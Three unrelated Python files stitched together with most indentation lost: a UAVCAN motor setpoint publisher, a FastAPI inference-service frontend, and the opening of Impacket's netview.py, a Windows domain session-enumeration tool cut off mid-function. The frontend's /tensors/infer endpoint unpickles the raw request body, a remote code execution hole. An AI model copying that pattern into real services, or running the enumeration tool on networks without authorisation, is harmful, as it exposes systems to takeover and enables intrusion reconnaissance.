SetpointPublisher.py
import enum
import logging
import time
import threading
import uavcan
class ControlTopic(enum.Enum):
voltage = 'voltage'
torque = 'torque'
velocity = 'velocity'
position = 'position'
def __str__(self):
return self.value
def __call__(self, node_id, value):
return {
'voltage': uavcan.thirdparty.cvra.motor.control.Voltage(node_id=node_id, voltage=value),
'torque': uavcan.thirdparty.cvra.motor.control.Torque(node_id=node_id, torque=value),
'velocity': uavcan.thirdparty.cvra.motor.control.Velocity(node_id=node_id, velocity=value),
'position': uavcan.thirdparty.cvra.motor.control.Position(node_id=node_id, position=value),
}[self.value]
class SetpointPublisher():
def __init__(self, node, topic, motor, value_min, value_max, period):
self.node = node
self.topic = topic
self.motor = motor
self.value_min = value_min
self.value_max = value_max
self.period = period
        self.lock = threading.RLock()
        self.value = value_min  # give the periodic callback a value before it first fires
        self.logger = logging.getLogger('SetpointPublisher')
        self.handle = node.node.periodic(0.01, self._publish)
        threading.Thread(target=self._update, daemon=True).start()
def _publish(self):
with self.lock:
            self.logger.info('Setpoint: {} {} to motor {} at period {}s'.format(self.topic, self.value, self.motor, self.period))
self.node.node.broadcast(self.topic(node_id=self.motor, value=self.value))
def _update(self):
while True:
with self.lock:
self.value = self.value_min
time.sleep(self.period)
with self.lock:
self.value = self.value_max
time.sleep(self.period)
def update(self):
self.handle.remove()
self.handle = self.node.node.periodic(0.01, self._publish)
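# A minimal usage sketch, not part of the original module: it assumes the CVRA
# DSDL definitions are already registered with the uavcan library, that a CAN
# interface named 'can0' exists, and that callers pass a wrapper whose `.node`
# attribute is the underlying UAVCAN node (SetpointPublisher calls node.node.*).
if __name__ == '__main__':
    import types
    logging.basicConfig(level=logging.INFO)
    raw_node = uavcan.make_node('can0', node_id=127)  # interface name and node id are assumptions
    wrapper = types.SimpleNamespace(node=raw_node)
    SetpointPublisher(wrapper, ControlTopic.velocity, motor=42,
                      value_min=-1.0, value_max=1.0, period=2.0)
    raw_node.spin()  # run the UAVCAN event loop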
root.py
import asyncio
import copy
import pickle
from threading import Thread
from typing import Union
from fastapi import APIRouter, File, Request, Security, UploadFile
from fastapi import HTTPException, status
from fastapi import Depends
import fastapi
from fastapi.security import APIKeyHeader
import time
from datetime import datetime
from main_processes.frontend.utils import (
async_download_to_memory,
download_from_direct_link,
download_to_memory,
get_db,
get_storage,
)
from nxs_libs.interface.frontend.simple_interface import (
SimpleFrontendTaskSummaryProcessor,
)
from nxs_libs.object.pipeline_runtime import NxsPipelineRuntime
from nxs_libs.storage.nxs_blobstore import NxsAzureBlobStorage
from nxs_libs.storage.nxs_blobstore_async import NxsAsyncAzureBlobStorage
from nxs_types.backend import NxsBackendType
from nxs_types.frontend import (
BasicResponse,
FrontendModelPipelineWorkloadReport,
FrontendWorkloadReport,
TaskSummary,
)
from nxs_types.infer import (
NxsInferBatchImageInputFromAzureBlobstore,
NxsInferBatchImageInputFromUrl,
NxsInferExtraParams,
NxsInferImageInputFromAzureBlobstore,
NxsInferImageInputFromUrl,
NxsInferInput,
NxsInferInputType,
NxsInferRequest,
NxsInferStatus,
NxsInferTextInput,
NxsTensorsInferRequest,
)
from nxs_types.infer_result import (
NxsInferResult,
NxsInferResultType,
NxsInferResultWithMetadata,
)
from nxs_types.log import (
NxsBackendCmodelThroughputLog,
NxsBackendDeploymentsLog,
NxsBackendThroughputLog,
NxsSchedulerLog,
)
from nxs_types.message import (
NxsMsgPinWorkload,
NxsMsgReportInputWorkloads,
NxsMsgUnpinWorkload,
)
from nxs_utils.nxs_helper import *
from nxs_utils.common import *
from nxs_types.model import *
from configs import *
from main_processes.frontend.args import parse_args
# setup global variables
args = parse_args()
router = APIRouter(prefix="/tasks")
api_key_header = APIKeyHeader(name="X-API-Key", auto_error=True)
task_summary_processor = SimpleFrontendTaskSummaryProcessor()
pipeline_cache: Dict[str, NxsPipelineInfo] = {}
tasks_data = []
tasks_summary_data = []
session_params = {}
task_result_dict = {}
task_result_t0_dict = {}
shared_queue_pusher: NxsQueuePusher = None
redis_kv_server: NxsSimpleKeyValueDb = None
backend_infos: List[NxsBackendThroughputLog] = []
backend_infos_t0 = 0
scheduler_info: NxsSchedulerLog = None
scheduler_info_t0 = 0
# FIXME: find a better way to do x-api-key check
async def check_api_key(api_key_header: str = Security(api_key_header)):
if args.api_key == "":
return True
if api_key_header != args.api_key:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="wrong api key",
)
return True
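# Illustrative only: a minimal client-side sketch of how a caller could satisfy
# check_api_key. The host/port and key value are assumptions; the "X-API-Key"
# header name and the "/tasks" prefix come from the definitions above.
def _example_authenticated_request():  # hypothetical helper, never called
    import requests
    resp = requests.post(
        "http://localhost:8080/tasks/sessions/create",  # assumed host/port
        headers={"X-API-Key": "my-secret-key"},         # must match args.api_key
        params={"extra_params_json_str": "{}"},
    )
    return resp.json()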
def task_monitor_thread():
global tasks_data, tasks_summary_data, task_summary_processor
task_dict: Dict[str, FrontendModelPipelineWorkloadReport] = {}
task_ts_dict = {}
task_ts0_dict = {}
task_fps_dict = {}
queue_pusher = create_queue_pusher_from_args(args, NxsQueueType.REDIS)
t0 = time.time()
while True:
to_trigger_wl_manager = False
for _ in range(len(tasks_data)):
pipeline_uuid, session_uuid = tasks_data.pop(0)
key = f"{pipeline_uuid}_{session_uuid}"
if key not in task_dict:
task_dict[key] = FrontendModelPipelineWorkloadReport(
pipeline_uuid=pipeline_uuid,
session_uuid=session_uuid,
fps=0,
)
task_ts0_dict[key] = time.time()
task_fps_dict[key] = 0
to_trigger_wl_manager = True
task_fps_dict[key] += 1
task_ts_dict[key] = time.time()
if to_trigger_wl_manager or time.time() - t0 > args.workload_report_period_secs:
keys_to_clean = []
cur_ts = time.time()
for key in task_ts0_dict:
if cur_ts - task_ts0_dict[key] > args.model_caching_timeout_secs:
keys_to_clean.append(key)
for key in keys_to_clean:
task_dict.pop(key)
task_ts_dict.pop(key)
task_ts0_dict.pop(key)
task_fps_dict.pop(key)
workload_reports = []
for key in task_dict:
wl = task_dict[key]
if task_fps_dict[key] > 0:
# wl.fps = task_fps_dict[key] / max(1, (time.time() - task_ts0_dict[key]))
wl.fps = task_fps_dict[key]
workload_reports.append(task_dict[key])
if workload_reports:
metadata = task_summary_processor.process_summaries(tasks_summary_data)
tasks_summary_data.clear()
msg = NxsMsgReportInputWorkloads(
data=FrontendWorkloadReport(
frontend_name=args.frontend_name,
workload_reports=workload_reports,
metadata=json.dumps(metadata),
)
)
queue_pusher.push(GLOBAL_QUEUE_NAMES.WORKLOAD_MANAGER, msg)
# print("SENT", msg)
# reset all fps
for key in task_fps_dict:
task_fps_dict[key] = 0
t0 = time.time()
time.sleep(0.01)
def task_result_recv_thread():
global args, task_result_dict, task_result_t0_dict
queue_puller = create_queue_puller_from_args(
args, NxsQueueType.REDIS, args.frontend_name
)
cleanup_t0 = time.time()
expiration_secs = 60
while True:
msgs = queue_puller.pull()
for msg in msgs:
msg: NxsInferResult = msg
task_result_dict[msg.task_uuid] = msg
task_result_t0_dict[msg.task_uuid] = time.time()
# print("RECV", msg)
if time.time() - cleanup_t0 > 60:
# clean up some unused data
cur_ts = time.time()
to_remove_task_uuids = []
for task_uuid in task_result_t0_dict:
if cur_ts - task_result_t0_dict[task_uuid] > 3 * expiration_secs:
to_remove_task_uuids.append(task_uuid)
            for task_uuid in to_remove_task_uuids:
                task_result_t0_dict.pop(task_uuid, None)
                task_result_dict.pop(task_uuid, None)
            cleanup_t0 = cur_ts  # reset so this cleanup runs roughly once per minute
time.sleep(0.002)
def setup():
global shared_queue_pusher, redis_kv_server
task_monitor_thr = Thread(target=task_monitor_thread, args=())
task_monitor_thr.start()
task_recv_thr = Thread(target=task_result_recv_thread, args=())
task_recv_thr.start()
shared_queue_pusher = create_queue_pusher_from_args(args, NxsQueueType.REDIS)
redis_kv_server = create_simple_key_value_db_from_args(
args, NxsSimpleKeyValueDbType.REDIS
)
if shared_queue_pusher is None:
setup()
@router.post("/sessions/create")
async def create_session(
extra_params_json_str: str = "{}",
authenticated: bool = Depends(check_api_key),
):
global redis_kv_server
    try:
        extra_params = json.loads(extra_params_json_str)
    except Exception:
        raise HTTPException(
            status.HTTP_400_BAD_REQUEST,
            "extra_params_json_str has to be a valid JSON string.",
        )
session_uuid = generate_uuid()
key = f"{session_uuid}_params"
redis_kv_server.set_value(key, extra_params)
# store data into redis server
return {"session_uuid": session_uuid}
@router.post("/sessions/delete")
async def delete_session(
session_uuid: str, authenticated: bool = Depends(check_api_key)
):
key = f"{session_uuid}_params"
redis_kv_server.delete_key(key)
return {}
@router.post("/images/infer-from-file", response_model=NxsInferResult)
async def submit_image_task(
pipeline_uuid: str,
session_uuid: str = "global",
file: UploadFile = File(...),
extra_params_json_str: str = '{"preproc": {}, "postproc": {}, "transform": {}}',
infer_timeout: float = 10,
authenticated: bool = Depends(check_api_key),
):
image_bin = await file.read()
extra_params = {}
    try:
        extra_params = json.loads(extra_params_json_str)
    except Exception:
        pass  # fall back to empty extra params if the JSON string is malformed
extra_params = NxsInferExtraParams(**extra_params)
try:
res = await _infer_single(
image_bin, pipeline_uuid, session_uuid, extra_params, infer_timeout
)
except Exception as e:
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[str(e)],
)
return res
@router.post("/images/infer-from-url", response_model=NxsInferResult)
async def submit_image_task_from_url(
infer_info: NxsInferImageInputFromUrl,
authenticated: bool = Depends(check_api_key),
):
return await process_image_task_from_url(
infer_info.pipeline_uuid,
infer_info.session_uuid,
infer_info.url,
infer_info.extra_params,
infer_info.infer_timeout,
)
@router.post("/images/batch-infer-from-url", response_model=List[NxsInferResult])
async def submit_batch_image_task_from_url(
infer_info: NxsInferBatchImageInputFromUrl,
authenticated: bool = Depends(check_api_key),
):
tasks = []
for url in infer_info.urls:
tasks.append(
process_image_task_from_url(
infer_info.pipeline_uuid,
infer_info.session_uuid,
url,
infer_info.extra_params,
infer_info.infer_timeout,
)
)
return await asyncio.gather(*tasks)
async def process_image_task_from_url(
pipeline_uuid: str,
session_uuid: str,
url: str,
extra_params: NxsInferExtraParams = NxsInferExtraParams(),
infer_timeout: float = 10,
) -> NxsInferResult:
try:
image_bin = await async_download_to_memory(url)
return await _infer_single(
image_bin, pipeline_uuid, session_uuid, extra_params, infer_timeout
)
except Exception as e:
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[str(e)],
)
@router.post("/images/infer-from-blobstore", response_model=NxsInferResult)
async def submit_image_task_from_azure_blobstore(
infer_info: NxsInferImageInputFromAzureBlobstore,
authenticated: bool = Depends(check_api_key),
):
external_model_store = NxsAsyncAzureBlobStorage.from_sas_token(
account_name=infer_info.blobstore_account_name,
sas_token=infer_info.blobstore_sas_token,
container_name=infer_info.blobstore_container_name,
)
res = await process_image_task_from_azure_blobstore(
infer_info.pipeline_uuid,
infer_info.session_uuid,
infer_info.blobstore_path,
external_model_store,
infer_info.extra_params,
infer_info.infer_timeout,
)
await external_model_store.close()
return res
@router.post("/images/batch-infer-from-blobstore", response_model=List[NxsInferResult])
async def submit_batch_image_task_from_azure_blobstore(
infer_info: NxsInferBatchImageInputFromAzureBlobstore,
authenticated: bool = Depends(check_api_key),
):
external_model_store = NxsAsyncAzureBlobStorage.from_sas_token(
account_name=infer_info.blobstore_account_name,
sas_token=infer_info.blobstore_sas_token,
container_name=infer_info.blobstore_container_name,
)
tasks = []
for blobstore_path in infer_info.blobstore_paths:
tasks.append(
process_image_task_from_azure_blobstore(
infer_info.pipeline_uuid,
infer_info.session_uuid,
blobstore_path,
external_model_store,
infer_info.extra_params,
infer_info.infer_timeout,
)
)
results = await asyncio.gather(*tasks)
await external_model_store.close()
return results
async def process_image_task_from_azure_blobstore(
pipeline_uuid: str,
session_uuid: str,
blobstore_path: str,
external_model_store: NxsAsyncAzureBlobStorage,
extra_params: NxsInferExtraParams = NxsInferExtraParams(),
infer_timeout: float = 10,
) -> NxsInferResult:
try:
image_bin = await external_model_store.download(blobstore_path)
return await _infer_single(
image_bin, pipeline_uuid, session_uuid, extra_params, infer_timeout
)
except Exception as e:
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[str(e)],
)
@router.post("/texts/infer", response_model=NxsInferResult)
async def submit_text_task(
infer_info: NxsInferTextInput,
authenticated: bool = Depends(check_api_key),
):
session_uuid: str = "global"
if infer_info.session_uuid is not None:
session_uuid = infer_info.session_uuid
try:
res = await _infer_single(
infer_info.text,
infer_info.pipeline_uuid,
session_uuid,
infer_info.extra_params,
infer_info.infer_timeout,
)
except Exception as e:
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[str(e)],
)
return res
@router.post("/tensors/infer", response_model=NxsInferResult)
async def submit_task_tensors(
request: Request,
authenticated: bool = Depends(check_api_key),
):
data: bytes = await request.body()
infer_request = pickle.loads(data)
if isinstance(infer_request, Dict):
try:
infer_request = NxsTensorsInferRequest(**infer_request)
except:
# raise HTTPException(
# status.HTTP_400_BAD_REQUEST,
# "request should be a pickled bytes of NxsTensorsInferRequest instance or a pickled bytes of NxsTensorsInferRequest dict.",
# )
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[
"request should be a pickled bytes of NxsTensorsInferRequest instance or a pickled bytes of NxsTensorsInferRequest dict."
],
)
if not isinstance(infer_request, NxsTensorsInferRequest):
# raise HTTPException(
# status.HTTP_400_BAD_REQUEST,
# "request should be a pickled bytes of NxsTensorsInferRequest instance or a pickled bytes of NxsTensorsInferRequest dict.",
# )
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[
"request should be a pickled bytes of NxsTensorsInferRequest instance or a pickled bytes of NxsTensorsInferRequest dict."
],
)
else:
infer_request: NxsTensorsInferRequest = infer_request
try:
res = await _infer_tensors(infer_request)
except Exception as e:
# raise HTTPException(status.HTTP_400_BAD_REQUEST, str(e))
return NxsInferResult(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.FAILED,
task_uuid="",
error_msgs=[str(e)],
)
return res
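# Illustrative only: how a client might build the pickled body /tensors/infer
# expects. Field names are taken from _infer_tensors and the NxsInferInput usage
# in this module; the uuid, input name and tensor payload are placeholders.
def _example_tensors_request_body() -> bytes:  # hypothetical helper, never called
    return pickle.dumps(
        {
            "pipeline_uuid": "<pipeline-uuid>",
            "session_uuid": "global",
            "inputs": [
                {
                    "name": "input_0",                       # model input name (assumed)
                    "type": NxsInferInputType.PICKLED_DATA,  # or ENCODED_IMAGE for image bytes
                    "data": pickle.dumps([1.0, 2.0, 3.0]),   # placeholder payload
                }
            ],
            "extra_preproc_params": "{}",
            "extra_transform_params": "{}",
            "extra_postproc_params": "{}",
            "infer_timeout": 10,
        }
    )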
if args.enable_benchmark_api:
@router.post("/benchmarks/redis")
async def submit_benchmark_redis_task(
file: UploadFile = File(...),
authenticated: bool = Depends(check_api_key),
):
global shared_queue_pusher
image_bin = await file.read()
# send this to redis
task_uuid = generate_uuid()
infer_result = NxsInferResultWithMetadata(
type=NxsInferResultType.CUSTOM,
status=NxsInferStatus.COMPLETED,
task_uuid=task_uuid,
metadata=image_bin,
)
shared_queue_pusher.push(args.frontend_name, infer_result)
# wait for result
result = {}
while True:
if task_uuid not in task_result_dict:
# time.sleep(0.01)
await asyncio.sleep(0.0025)
continue
result = task_result_dict.pop(task_uuid)
break
return {"status": "COMPLETED"}
if args.enable_scaling:
@router.post("/backends/scale/gpu", response_model=BasicResponse)
async def scale_backends(
num_backends: int,
authenticated: bool = Depends(check_api_key),
):
if num_backends < 0:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
"num_backends must be at least 0",
)
deployment_items = []
try:
from kubernetes import client, config
config.load_kube_config()
api_instance = client.AppsV1Api()
deployment = api_instance.list_namespaced_deployment(namespace="nxs")
deployment_items = deployment.items
except Exception as e:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
"Internal error. Please try again later.",
)
found_gpu_backend_deployment = False
for item in deployment_items:
if "name" not in item.metadata.labels:
continue
if item.metadata.labels["name"] == "nxs-backend-gpu":
item.spec.replicas = num_backends
try:
api_response = api_instance.patch_namespaced_deployment(
"nxs-backend-gpu", "nxs", item
)
found_gpu_backend_deployment = True
except Exception as e:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
"Internal error. Please try again later.",
)
if not found_gpu_backend_deployment:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
"Could not find nxs-backend-gpu deployment.",
)
return BasicResponse(is_successful=True)
def get_backend_logs() -> List[NxsBackendThroughputLog]:
global redis_kv_server
logs = redis_kv_server.get_value(GLOBAL_QUEUE_NAMES.BACKEND_MONITOR_LOGS)
if logs is None:
logs = []
return logs
@router.get("/monitoring/backends", response_model=List[NxsBackendThroughputLog])
async def get_monitoring_backend_reports(
authenticated: bool = Depends(check_api_key),
):
global redis_kv_server, backend_infos, backend_infos_t0
logs = get_backend_logs()
backend_infos_t0 = time.time()
backend_infos = logs
return logs
if args.enable_scaling:
def get_num_deployment_replicas(deployment_name: str) -> int:
num_replicas = 0
deployment_items = []
try:
from kubernetes import client, config
config.load_kube_config()
api_instance = client.AppsV1Api()
deployment = api_instance.list_namespaced_deployment(namespace="nxs")
deployment_items = deployment.items
except Exception as e:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
"Internal error. Please try again later.",
)
for item in deployment_items:
if "name" not in item.metadata.labels:
continue
if item.metadata.labels["name"] == deployment_name:
num_replicas = item.spec.replicas
return num_replicas
@router.get(
"/monitoring/backend_deployments", response_model=NxsBackendDeploymentsLog
)
async def get_backend_deployments(
authenticated: bool = Depends(check_api_key),
):
num_requested_cpu_backends = 0
num_requested_gpu_backends = 0
num_available_cpu_backends = 0
num_available_gpu_backends = 0
backend_infos = get_backend_logs()
for backend_info in backend_infos:
if backend_info.backend_type == NxsBackendType.CPU:
num_available_cpu_backends += 1
elif backend_info.backend_type == NxsBackendType.GPU:
num_available_gpu_backends += 1
num_requested_cpu_backends = get_num_deployment_replicas("nxs-backend-cpu")
num_requested_gpu_backends = get_num_deployment_replicas("nxs-backend-gpu")
return NxsBackendDeploymentsLog(
num_requested_cpu_backends=num_requested_cpu_backends,
num_available_cpu_backends=num_available_cpu_backends,
num_requested_gpu_backends=num_requested_gpu_backends,
num_available_gpu_backends=num_available_gpu_backends,
)
def get_scheduler_log() -> NxsSchedulerLog:
global redis_kv_server
scheduler_log: NxsSchedulerLog = redis_kv_server.get_value(
GLOBAL_QUEUE_NAMES.SCHEDULER_LOGS
)
if scheduler_log is None:
scheduler_log = NxsSchedulerLog()
return scheduler_log
@router.get("/monitoring/scheduler", response_model=NxsSchedulerLog)
async def get_monitoring_scheduler_report(
authenticated: bool = Depends(check_api_key),
):
global scheduler_info, scheduler_info_t0
scheduler_info = get_scheduler_log()
scheduler_info_t0 = time.time()
return scheduler_info
async def _infer_single(
data: Union[bytes, str],
pipeline_uuid: str,
session_uuid: str,
users_extra_params: NxsInferExtraParams = NxsInferExtraParams(),
infer_timeout: float = 10,
) -> NxsInferResult:
global tasks_data, shared_queue_pusher, task_result_dict, tasks_summary_data
global task_summary_processor, session_params, redis_kv_server
global backend_infos_t0, backend_infos
global scheduler_info, scheduler_info_t0
entry_t0 = time.time()
if entry_t0 - backend_infos_t0 > 15:
backend_infos = get_backend_logs()
backend_infos_t0 = time.time()
if not backend_infos:
raise Exception("No backend is available.")
to_wait = True
if not args.wait_for_models:
if entry_t0 - scheduler_info_t0 > 15:
scheduler_info = get_scheduler_log()
scheduler_info_t0 = time.time()
cmodel_uuids: List[str] = []
for request in scheduler_info.scheduling_requests:
if request.pipeline_uuid == pipeline_uuid:
cmodel_uuids.extend(request.cmodel_uuid_list)
if not cmodel_uuids:
# models are not scheduled yet
to_wait = False
for cmodel_uuid in cmodel_uuids:
found_cmodel = False
for plan in scheduler_info.scheduling_plans:
for cmodel_uuid_on_backend in plan.cmodel_uuid_list:
if cmodel_uuid_on_backend == cmodel_uuid:
found_cmodel = True
break
if found_cmodel:
break
if not found_cmodel:
to_wait = False
break
task_uuid = generate_uuid()
task_summary = TaskSummary(
pipeline_uuid=pipeline_uuid,
session_uuid=session_uuid,
task_uuid=task_uuid,
start_ts=entry_t0,
)
task_summary_processor.pre_task_processing(task_summary)
pipeline = _get_pipeline_info(pipeline_uuid)
if pipeline is None:
raise Exception("invalid pipeline uuid")
# num_inputs = len(pipeline.models[0].component_models[0].model_desc.inputs)
# if num_inputs > 1:
# raise Exception("This api only works with single input models.")
# num_shape_dims = len(
# pipeline.models[0].component_models[0].model_desc.inputs[0].shape
# )
# if num_shape_dims != 4:
# raise HTTPException(
# status.HTTP_400_BAD_REQUEST,
# "This api only works on input with 4 dims.",
# )
tasks_data.append((pipeline_uuid, session_uuid))
if not to_wait:
raise Exception("Model is not ready to serve. Please try again later.")
pipeline_uuids = copy.deepcopy(pipeline.pipeline)
pipeline_uuids.append(args.frontend_name)
model_input = pipeline.models[0].component_models[0].model_desc.inputs[0]
model_input_type = NxsInferInputType.ENCODED_IMAGE
if isinstance(data, str):
model_input_type = NxsInferInputType.PICKLED_DATA
data = pickle.dumps(data)
next_topic = pipeline_uuids.pop(0)
_extra_params = _get_session_params(session_uuid)
infer_task = NxsInferRequest(
task_uuid=task_uuid,
session_uuid=session_uuid,
exec_pipelines=pipeline_uuids,
inputs=[
NxsInferInput(
name=model_input.name,
type=model_input_type,
data=data,
)
],
extra_preproc_params=json.dumps(users_extra_params.preproc),
extra_transform_params=json.dumps(users_extra_params.transform),
extra_postproc_params=json.dumps(users_extra_params.postproc),
extra_params=json.dumps(_extra_params),
)
# shared_queue_pusher.push(next_topic, infer_task)
shared_queue_pusher.push_to_session(next_topic, session_uuid, infer_task)
# wait for result
result = {}
while True:
if time.time() - entry_t0 > infer_timeout:
raise Exception("Request timeout")
if task_uuid not in task_result_dict:
# time.sleep(0.01)
await asyncio.sleep(0.0025)
continue
result = task_result_dict.pop(task_uuid)
break
task_summary.end_ts = time.time()
task_summary.e2e_latency = task_summary.end_ts - entry_t0
if isinstance(result, NxsInferResult):
result.e2e_latency = task_summary.e2e_latency
task_summary_processor.post_task_processing(task_summary)
tasks_summary_data.append(task_summary)
return NxsInferResult(**(result.dict()))
async def _infer_tensors(infer_request: NxsTensorsInferRequest):
global tasks_data, shared_queue_pusher, task_result_dict
global tasks_summary_data, task_summary_processor, session_params, redis_kv_server
global backend_infos_t0, backend_infos
entry_t0 = time.time()
if entry_t0 - backend_infos_t0 > 15:
backend_infos = get_backend_logs()
backend_infos_t0 = time.time()
if not backend_infos:
raise Exception("No backend is available. Please bring up some backends.")
task_uuid = generate_uuid()
task_summary = TaskSummary(
pipeline_uuid=infer_request.pipeline_uuid,
session_uuid=infer_request.session_uuid,
task_uuid=task_uuid,
start_ts=entry_t0,
)
task_summary_processor.pre_task_processing(task_summary)
pipeline = _get_pipeline_info(infer_request.pipeline_uuid)
if pipeline is None:
raise Exception("invalid pipeline uuid")
tasks_data.append((infer_request.pipeline_uuid, infer_request.session_uuid))
pipeline_uuids = copy.deepcopy(pipeline.pipeline)
pipeline_uuids.append(args.frontend_name)
next_topic = pipeline_uuids.pop(0)
extra_params = _get_session_params(infer_request.session_uuid)
infer_task = NxsInferRequest(
task_uuid=task_uuid,
session_uuid=infer_request.session_uuid,
exec_pipelines=pipeline_uuids,
inputs=infer_request.inputs,
extra_preproc_params=infer_request.extra_preproc_params,
extra_transform_params=infer_request.extra_transform_params,
extra_postproc_params=infer_request.extra_postproc_params,
extra_params=json.dumps(extra_params),
)
# shared_queue_pusher.push(next_topic, infer_task)
shared_queue_pusher.push_to_session(
next_topic, infer_request.session_uuid, infer_task
)
# wait for result
result = {}
while True:
if time.time() - entry_t0 > infer_request.infer_timeout:
raise Exception("Request timeout")
if task_uuid not in task_result_dict:
# time.sleep(0.01)
await asyncio.sleep(0.0025)
continue
result = task_result_dict.pop(task_uuid)
break
task_summary.end_ts = time.time()
task_summary.e2e_latency = task_summary.end_ts - entry_t0
if isinstance(result, NxsInferResult):
result.e2e_latency = task_summary.e2e_latency
task_summary_processor.post_task_processing(task_summary)
tasks_summary_data.append(task_summary)
return NxsInferResult(**(result.dict()))
def _get_pipeline_info(pipeline_uuid) -> Union[NxsPipelineInfo, None]:
global pipeline_cache
if pipeline_uuid in pipeline_cache:
return pipeline_cache[pipeline_uuid]
db = get_db(args)
pipeline = NxsPipelineRuntime.get_from_db(pipeline_uuid, db)
db.close()
if pipeline is not None:
pipeline_cache[pipeline_uuid] = pipeline.get_pipeline_info()
return pipeline_cache[pipeline_uuid]
return None
def _get_session_params(session_uuid) -> Dict:
    global session_params, redis_kv_server
    if session_uuid in session_params:
        return session_params[session_uuid]
    # create_session stores params under "<session_uuid>_params"; read the same key here.
    extra_params = redis_kv_server.get_value(f"{session_uuid}_params")
    if extra_params is None:
        extra_params = {}
    else:
        session_params[session_uuid] = extra_params
    return extra_params
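# Illustrative only: a client-side sketch for /tasks/images/infer-from-url. The
# JSON fields mirror how submit_image_task_from_url reads NxsInferImageInputFromUrl;
# host/port, API key and pipeline uuid are placeholders, and the remaining model
# fields are assumed to have defaults.
def _example_infer_from_url():  # hypothetical helper, never called
    import requests
    resp = requests.post(
        "http://localhost:8080/tasks/images/infer-from-url",  # assumed host/port
        headers={"X-API-Key": "my-secret-key"},
        json={
            "pipeline_uuid": "<pipeline-uuid>",
            "session_uuid": "global",
            "url": "https://example.com/cat.jpg",
            "infer_timeout": 10,
        },
    )
    return resp.json()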
netview.py
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# The idea of this script is to get a list of the sessions
# opened at the remote hosts and keep track of them.
# Coincidentally @mubix did something similar a few years
# ago so credit goes to him (and the script's name ;)).
# Check it out at https://github.com/mubix/netview
# The main difference with our approach is we keep
# looping over the hosts found and keep track of who logged
# in/out from remote servers. Plus, we keep the connections
# with the target systems and just send a few DCE-RPC packets.
#
# One VERY IMPORTANT thing is:
#
# YOU HAVE TO BE ABLE TO RESOLVE THE DOMAIN MACHINES' NETBIOS
# NAMES. That's usually solved by setting your DNS to the
# domain DNS (and the right search domain).
#
# Some examples of usage are:
#
# netview.py -target 192.168.1.10 beto
#
# This will show the sessions on 192.168.1.10 and will authenticate as 'beto'
# (password will be prompted)
#
# netview.py FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticated as 'beto'
# and will gather the session information for those machines that appear
# to be up. There is a background thread checking aliveness of the targets
# at all times.
#
# netview.py -users /tmp/users -dc-ip freefly-dc.freefly.net -k FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticating using
# Kerberos (that's why -dc-ip parameter is needed), and filter
# the output based on the list of users specified in /tmp/users file.
#
# Author:
# beto (@agsolino)
#
from __future__ import division
from __future__ import print_function
import sys
import argparse
import logging
import socket
from threading import Thread, Event
from queue import Queue
from time import sleep
from impacket.examples import logger
from impacket.examples.utils import parse_credentials
from impacket import version
from impacket.smbconnection import SessionError
from impacket.dcerpc.v5 import transport, wkst, srvs, samr
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.nt_errors import STATUS_MORE_ENTRIES
machinesAliveQueue = Queue()
machinesDownQueue = Queue()
myIP = None
def checkMachines(machines, stopEvent, singlePass=False):
origLen = len(machines)
deadMachines = machines
done = False
while not done:
if stopEvent.is_set():
done = True
break
        for machine in list(deadMachines):  # iterate over a copy; alive machines are removed from the list below
s = socket.socket()
try:
s = socket.create_connection((machine, 445), 2)
global myIP
myIP = s.getsockname()[0]
s.close()
machinesAliveQueue.put(machine)
except Exception as e:
logging.debug('%s: not alive (%s)' % (machine, e))
pass
else:
logging.debug('%s: alive!' % machine)
deadMachines.remove(machine)
if stopEvent.is_set():
done = True
break
logging.debug('up: %d, down: %d, total: %d' % (origLen-len(deadMachines), len(deadMachines), origLen))
if singlePass is True:
done = True
if not done:
sleep(10)
# Do we have some new deadMachines to add?
while machinesDownQueue.empty() is False:
deadMachines.append(machinesDownQueue.get())
class USERENUM:
def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, options=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = options.dc_ip
self.__options = options
self.__machinesList = list()
self.__targets = dict()
self.__filterUsers = None
self.__targetsThreadEvent = None
self.__targetsThread = None
self.__maxConnections = int(options.max_connections)
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def getDomainMachines(self):
if self.__kdcHost is not None:
domainController = self.__kdcHost
elif self.__domain != '':
domainController = self.__domain
else:
raise Exception('A domain is needed!')
        logging.info('Getting the machines list from %s' % domainController)
rpctransport = transport.SMBTransport(domainController, 445, r'\samr', self.__username, self.__password,
self.__domain, self.__lmhash, self.__nthash, self.__aesKey,
doKerberos=self.__doKerberos, kdcHost = self.__kdcHost)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
logging.info("Looking up users in domain %s" % domains[0]['Name'])
